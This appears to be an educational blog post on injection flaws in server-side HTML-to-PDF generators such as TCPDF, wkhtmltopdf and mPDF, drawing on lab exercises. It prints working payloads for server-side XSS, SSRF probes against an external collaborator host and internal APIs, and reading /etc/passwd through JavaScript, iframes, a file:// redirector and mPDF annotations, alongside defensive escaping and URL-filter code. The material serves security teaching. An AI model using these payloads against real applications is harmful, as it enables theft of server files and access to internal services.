Today I want to discuss PDF generation in web applications and the critical vulnerabilities associated with it. Many of you already know this class of vulnerability, but it is worth walking through in detail.
Most web applications provide a PDF generation feature, commonly used for invoices or reports, which often incorporates dynamic user input. This article covers the misconfigurations and flaws that can turn that feature into a critical security vulnerability. The root cause is HTML injection: user input is passed unsanitized to the PDF generation library.
Let's talk about PDF!
PDF (Portable Document Format) is a widely used format designed for platform-independent document display. Many web applications incorporate PDF generation capabilities, typically through external libraries or plugins.
However, vulnerabilities can arise due to misconfigurations, insufficient security settings, or outdated versions of these libraries, often allowing attackers to exploit unsanitized malicious input.
Here are a few PDF generation libraries commonly used in web applications:
Web applications often need to control the layout of generated PDF files, so these libraries take HTML as input and use it to produce the final PDF. This enables the application to manage the PDF’s design through CSS within the HTML. These libraries operate by parsing the HTML, rendering it, and then converting it into a PDF.
TCPDF is a popular open-source PHP library used to generate PDF documents programmatically. It is known for its ability to convert HTML and CSS into a PDF file without requiring any external extensions. Below is an overview of how TCPDF works, followed by some example code to illustrate its usage.
Because TCPDF accepts HTML as input, an application that places untrusted user input into that HTML without proper sanitization is exposed to HTML injection. An attacker can inject arbitrary HTML, and depending on how the library and the viewer handle it, this may escalate to XSS.
$html = '<h1>' . $_GET['title'] . '</h1>'; // Vulnerable: unsanitized user input
$pdf->writeHTML($html);
If an attacker passes a script tag in the title parameter (<script>alert('XSS')</script>), the markup reaches the PDF generator unchanged. If the user input is not sanitized, it is rendered, and possibly executed, as part of the generated PDF.
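The fix for this pattern is to escape user input before it is concatenated into the HTML. The sketch below illustrates the idea in Python rather than PHP; `build_title_html` is a hypothetical helper, not part of TCPDF. In the PHP example above, the equivalent step would be wrapping `$_GET['title']` in `htmlspecialchars()`.

```python
import html


def build_title_html(title):
    """Return an <h1> fragment with the user-supplied title HTML-escaped."""
    # html.escape turns <, >, & and (with quote=True) both quote characters
    # into entities, so injected tags are rendered as literal text.
    return "<h1>" + html.escape(title, quote=True) + "</h1>"


# The script tag from the example above becomes harmless text.
print(build_title_html("<script>alert('XSS')</script>"))
# <h1>&lt;script&gt;alert(&#x27;XSS&#x27;)&lt;/script&gt;</h1>
```

Escaping only helps when the input is meant to be plain text. If users are allowed to submit markup, an allow-list HTML sanitizer is needed instead.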
Another example: wkhtmltopdf
Wkhtmltopdf is an open-source command-line tool that converts HTML to PDF using the WebKit rendering engine, which is also used in web browsers. It renders HTML pages into PDF with support for CSS, JavaScript, and even images. It is often used in server-side environments to generate PDFs from HTML templates.
Avoid using wkhtmltopdf with untrusted HTML content. Always sanitize user-provided HTML or JavaScript, as failure to do so may result in a complete server compromise!
For setup and installation details, refer to the official wkhtmltopdf documentation.
After downloading wkhtmltopdf, we can install it using the following command on Debian-based Linux distributions:
$ sudo dpkg -i wkhtmltox_0.12.6.1-2.bullseye_amd64.deb
Running wkhtmltopdf with the -h option will display the tool's help information:
$ wkhtmltopdf -h
Name:
wkhtmltopdf 0.12.6.1 (with patched qt)
Synopsis:
wkhtmltopdf [GLOBAL OPTION]... [OBJECT]... <output file>
<SNIP>
When providing a URL to wkhtmltopdf, it will automatically fetch the website and convert it to a PDF:
$ wkhtmltopdf https://application.com/ thisfile.pdf
Loading pages (1/6)
Counting pages (2/6)
Resolving links (4/6)
Loading headers and footers (5/6)
Printing pages (6/6) Done
By examining the generated PDF, we can still identify the application website, though it has been resized to fit the PDF pages.
Here’s how you can use wkhtmltopdf from the command line to convert an HTML file to a PDF.
$ wkhtmltopdf input.html output.pdf
This command takes an HTML file (input.html) and converts it into a PDF (output.pdf).
Additionally, we can supply the tool with a local HTML file to better simulate how a PDF generation library operates within a web application. For instance, consider the following HTML file:
We can now execute wkhtmltopdf on this HTML file to generate a corresponding PDF.
$ wkhtmltopdf ./index.html output.pdf
Loading pages (1/6)
Counting pages (2/6)
Resolving links (4/6)
Loading headers and footers (5/6)
Printing pages (6/6) Done
htb snippet
wkhtmltopdf handles the HTML-to-PDF conversion and is easy to integrate into web applications. It supports CSS and JavaScript, which makes it well suited to generating rich PDFs from dynamic HTML content in server-side applications.
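As a rough illustration of that integration, a backend might shell out to wkhtmltopdf as in the sketch below. The function names are hypothetical. The two flags shown, `--disable-javascript` and `--disable-local-file-access`, are real wkhtmltopdf options, and including them is an assumption about a hardened setup, not something every application does.

```python
import subprocess


def build_wkhtmltopdf_command(input_html, output_pdf):
    """Build the argument list for a hardened wkhtmltopdf call."""
    return [
        "wkhtmltopdf",
        "--disable-javascript",         # do not run scripts found in the HTML
        "--disable-local-file-access",  # block file:// access from the page
        input_html,
        output_pdf,
    ]


def render_pdf(input_html, output_pdf):
    """Run wkhtmltopdf; raises CalledProcessError if the conversion fails."""
    # Passing a list (no shell=True) keeps file names from being
    # interpreted by a shell.
    subprocess.run(
        build_wkhtmltopdf_command(input_html, output_pdf),
        check=True,
        timeout=60,
    )


print(" ".join(build_wkhtmltopdf_command("index.html", "output.pdf")))
```

An application that calls the tool without these flags, or on a version with different defaults, is where the attacks described later become possible.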
Here’s a simple real-world example of how a web application might generate a PDF receipt after a user submits a purchase form.
Example: Invoice PDF Generation
1. HTML Form (User Input)
Create a basic HTML form (purchase.html) where users can enter their details to generate a PDF invoice. A PDF generation library makes this straightforward: for instance, we can download an open-source invoice HTML template and use wkhtmltopdf to create a PDF invoice from the HTML and its custom CSS. The resulting PDF looks like this:
Source: htb
We can also analyze generated PDF files with various tools to identify specific vulnerabilities and misconfigurations.
Most of the libraries mentioned above add metadata to the PDF, which we can use to identify the generator.
To display the metadata, we can use exiftool (see its documentation for further options). Among other fields, it shows the Creator of the PDF file.
e.g.:
user$ exiftool invoice.pdf
Creator: wkhtmltopdf 0.12.6.1
We can use this information to look up vulnerabilities affecting this particular version. Another tool, pdfinfo, can perform the same task.
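When checking many files, the same lookup can be scripted. The following is a minimal sketch that parses the text output of exiftool and looks for a known generator name. Both function names and the list of generator names are assumptions made for illustration.

```python
KNOWN_GENERATORS = ("wkhtmltopdf", "TCPDF", "mPDF")


def parse_exiftool_output(text):
    """Turn 'Key : Value' lines from exiftool into a dictionary."""
    fields = {}
    for line in text.splitlines():
        # Split on the first colon only, since values may contain colons.
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def identify_generator(fields):
    """Return the first known generator named in Creator or Producer."""
    for field in ("Creator", "Producer"):
        value = fields.get(field, "").lower()
        for name in KNOWN_GENERATORS:
            if name.lower() in value:
                return name
    return None


sample = "Creator                         : wkhtmltopdf 0.12.6.1"
print(identify_generator(parse_exiftool_output(sample)))  # wkhtmltopdf
```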
Now let's move to the EXPLOITATION part.
We learned how PDF generation libraries function and how to identify them. After identifying the libraries, we can explore how to exploit the vulnerabilities that arise from misconfigurations. All of these vulnerabilities rely on inserting malicious user-provided content into the PDF generator’s input.
I have already shared a resource about a hacking technique involving PDFs in a LinkedIn post. It covers an alternative method based on PDF uploads and their exploitation, which you can review later.
Executing HTML Code
The basic test case here is HTML injection. It occurs when an attacker injects malicious HTML into a web application's PDF generation process. Many PDF generators, such as wkhtmltopdf, TCPDF, or similar libraries, allow HTML input to be converted into a PDF. If this input isn't properly sanitized, attackers can exploit vulnerabilities by injecting harmful code.
How HTML Code Injection Happens:
Example Scenario:
A web application allows users to input HTML code to generate reports or invoices in PDF format. If the input isn’t sanitized, an attacker could submit the following:
<h1>test2</h1> <script>alert('PDF Exploit!')</script>
This code would be processed by the PDF generator. If the generator executes JavaScript while rendering, the script runs during PDF generation. This is a simple example, but more complex exploits could involve stealing sensitive data or compromising the system.
As this shows, the same injection point lets us supply JavaScript as well as HTML.
Executing JavaScript Code
Executing JavaScript code here means running scripts inside the JavaScript runtime of the PDF generator rather than in a user's web browser.
Many PDF generation libraries like wkhtmltopdf or TCPDF allow HTML input and may execute embedded JavaScript within that input when generating the PDF.
JavaScript execution can occur in two primary ways:
When the PDF generation library processes HTML input, it may execute the injected JavaScript code. Moreover, since the PDF generation library operates on the server, the payload would also be executed on the server, making this type of vulnerability known as Server-Side XSS.
JavaScript execution in PDFs refers to the ability to embed and run JavaScript code within a PDF document, which opens up further attack vectors. In both cases we are looking for malicious user input that ends up directly in the PDF generator's input: the library renders the HTML and executes the injected JavaScript.
How JavaScript Code Execution Happens in PDF Generation
Example of JavaScript Injection in PDF Generation
Suppose a web application allows users to input text, which is then embedded into an HTML template for generating a PDF. An attacker could input the following malicious script:
<script>alert('PDF Attack!')</script>
<script>document.write('PDF Hacked')</script>
If this input is not properly sanitized and the PDF generator (e.g., wkhtmltopdf) processes it, the script runs while the PDF is being rendered. The alert typically has no visible effect in a headless renderer, but the string PDF Hacked written by document.write appears in the generated PDF.
This is a basic cross-site scripting example. As a first real exploit, let's trigger an information disclosure that reveals a file path on the web server. This can be achieved with the following payload:
<script>document.write(window.location)</script>
If you run the above script in a PDF generator that accepts and processes HTML input, the behavior depends on several factors, including how the PDF generator handles JavaScript and whether JavaScript is enabled in the PDF viewer.
Server-Side Request Forgery
Server-Side Request Forgery (SSRF) in PDF Generators occurs when an attacker manipulates a PDF generator to make unauthorized requests on behalf of the server. This can lead to information disclosure, internal network scanning, or even compromise of internal services that are otherwise inaccessible.
SSRF vulnerabilities often arise in systems where external content (e.g., URLs or resources) is dynamically included in generated PDFs. Attackers exploit these vulnerabilities by injecting malicious URLs, tricking the server into fetching unintended resources.
To identify SSRF, we can inject different HTML tags that force the server to issue an HTTP request.
<img src="http://csdflkjldkasȠlksdfldsf.oastify.com/testssrf1">
In a similar way, we can inject a stylesheet by using the link tag:
<link rel="stylesheet" href="http://csdflkjldkasȠlksdfldsf.oastify.com/testssrf2" >
Typically, for images and stylesheets, the response does not appear in the generated PDF, resulting in a blind SSRF vulnerability that limits our ability to exploit it. However, depending on the (mis)configuration of the PDF generation library, we can inject other HTML elements that can initiate a request and cause the server to display the response. One such example is an iframe:
<iframe src="http://csdflkjldkasȠlksdfldsf.oastify.com/testssrf3"></iframe>
Injecting the three payloads and generating a PDF triggers three requests to our collaborator domains, successfully confirming SSRF with all three payloads.
We can verify this by checking the collaborator client and reviewing the output PDF file.
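If no collaborator service is available, a small listener on a host we control can serve the same purpose. The sketch below uses only the Python standard library. `start_listener` is a hypothetical helper, and it assumes the target server can reach the host and port it binds to.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def start_listener(host="127.0.0.1", port=0):
    """Start a background HTTP server that records every requested path."""
    hits = []

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            hits.append(self.path)  # e.g. "/testssrf1"
            self.send_response(200)
            self.send_header("Content-Type", "text/plain")
            self.end_headers()
            self.wfile.write(b"ok")

        def log_message(self, format, *args):
            pass  # silence the default per-request logging

    # port=0 lets the OS pick a free port; read it from server.server_address
    server = HTTPServer((host, port), Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, hits


# Usage: bind to an address the target can reach, inject payloads pointing
# at it, generate the PDF, then inspect `hits` and call server.shutdown().
```

Each injected tag that triggers a request adds its path to `hits`, which makes it easy to see which payloads worked.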
As a result, we have a regular SSRF vulnerability rather than a blind one, which is far more critical as it enables us to exfiltrate data more easily. For example, we can send a request to any internal endpoint and have the response displayed to us. Here’s how we can leak data from an internal API:
SSRF via External Resource Inclusion
If the PDF generator fetches external resources (such as images, stylesheets, or scripts) from user-provided URLs, an attacker can supply a malicious URL pointing to internal services.
<iframe src="http://127.0.0.1:8080/api/user" width="800" height="500"></iframe>
The generated PDF includes the response from the internal API, potentially exposing sensitive information that would otherwise be inaccessible from the outside:
Source htb labs
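From the defender's side, one partial countermeasure is to reject resource URLs that point at internal addresses before the HTML reaches the PDF generator. The function below is a minimal sketch with a hypothetical name. It only inspects the URL as written, so it does not cover hostnames that resolve to internal addresses or redirects issued by an external server.

```python
import ipaddress
from urllib.parse import urlparse


def is_blocked_resource_url(url):
    """Return True if the URL should not be fetched by the PDF generator."""
    parsed = urlparse(url)
    # Only plain web URLs are allowed; file:// and other schemes are rejected.
    if parsed.scheme not in ("http", "https"):
        return True
    host = parsed.hostname
    if host is None or host.lower() == "localhost":
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal. A real check would also resolve the hostname.
        return False
    return addr.is_private or addr.is_loopback or addr.is_link_local


print(is_blocked_resource_url("http://127.0.0.1:8080/api/user"))  # True
print(is_blocked_resource_url("https://example.com/logo.png"))    # False
```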
Local File Inclusion
Local File Inclusion (LFI) in a PDF generation web application occurs when an attacker can manipulate the input to the PDF generator to include or read files from the server’s file system. This vulnerability often arises when the web application does not properly sanitize user input, allowing the attacker to reference local files on the server.
There are several HTML elements we can attempt to inject in order to read local files on the server.
If the server executes our injected JavaScript, we can use XMLHttpRequest and the file protocol to read local files, leading to a payload like this:
<script> x = new XMLHttpRequest(); x.onload = function(){ document.write(this.responseText) }; x.open("GET", "file:///etc/passwd"); x.send(); </script>
By injecting this JavaScript code, we can view the contents of the passwd file in the generated PDF:
However, this method can be impractical for certain files, as extracting data from the PDF may corrupt it. For example, syntax might break if we attempt to exfiltrate an SSH key. Additionally, files with binary data cannot be extracted in this manner. Therefore, we should base64-encode the file using the btoa function before including it in the PDF:
<script> x = new XMLHttpRequest(); x.onload = function(){ document.write(btoa(this.responseText)) }; x.open("GET", "file:///etc/passwd"); x.send(); </script>
However, this results in a single long line that may be truncated if it doesn’t fit on the PDF page, as the library usually doesn’t insert line breaks.
Source htb
We can modify the payload to add a line break every 100 characters so that the output fits on the PDF page.
<script> function addNewlines(str) { var result = ''; while (str.length > 0) { result += str.substring(0, 100) + '\n'; str = str.substring(100); } return result; } x = new XMLHttpRequest(); x.onload = function(){ document.write(addNewlines(btoa(this.responseText))) }; x.open("GET", "file:///etc/passwd"); x.send(); </script>
After making these changes, we can retrieve the file successfully. The base64-encoded data can now be copied and decoded using any tool that ignores line breaks in the input.
In some cases the backend does not execute our injected JavaScript, and we must rely on HTML tags to display local files.
Some example payloads:
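The decoding step can be done in a few lines of Python. This is a minimal sketch with a hypothetical helper name. It strips all whitespace first, because text copied out of a PDF viewer may contain spaces as well as line breaks.

```python
import base64


def decode_wrapped_base64(text):
    """Decode base64 text that was wrapped across several lines."""
    # str.split() with no arguments splits on any run of whitespace,
    # so joining the pieces removes spaces, tabs and newlines.
    compact = "".join(text.split())
    return base64.b64decode(compact)


# Paste the text copied from the PDF between the triple quotes.
copied = """
cm9vdDp4OjA6MDpyb290Oi9yb290
Oi9iaW4vYmFzaAo=
"""
print(decode_wrapped_base64(copied).decode())
```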
<iframe src="file:///etc/passwd" width="1000" height="500"></iframe>
<object data="file:///etc/passwd" width="1000" height="500">
<portal src="file:///etc/passwd" width="1000" height="500">
<img src="/etc/passwd" />
<img src="/var/log/apache2/access.log" />
<img src="C:\\windows\\system32\\drivers\\etc\\hosts" />
However, in our test environment, this only results in an empty iframe being displayed.
To display the contents of a file like /etc/passwd, you can use a different approach: point the iframe's src at a server you control, which then redirects the request to the local file. Here's how you can do it:
Host the following code as redirector.php on a machine you control that the target server can reach:
<?php header('Location: file://' . $_GET['url']); ?>
Then inject the following payload into the application:
<iframe src="http://172.17.0.1:8000/redirector.php?url=%2fetc%2fpasswd" width="800" height="500"></iframe>
This produces the following output:
Source: htb
You can try other methods for LFI exploitation in PDF generators. Another interesting one uses PDF annotations.
PDF annotations are elements like comments, highlights, and attachments that can be added to a PDF. They can be used to include additional data or modify the document’s behavior.
If the application uses the mPDF library to generate PDFs, annotations are supported via the <annotation> tag.
We can use annotations to append files to a generated PDF by injecting a payload such as the following:
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="mPDF" />
Examining the generated PDF file, we see an annotation with an attached file. Clicking on the attachment reveals the /etc/passwd file.
Source htb
Check the mPDF GitHub repository for security updates related to annotations or content handling.
A few other libraries also support annotations; check their documentation for details.
Mitigations: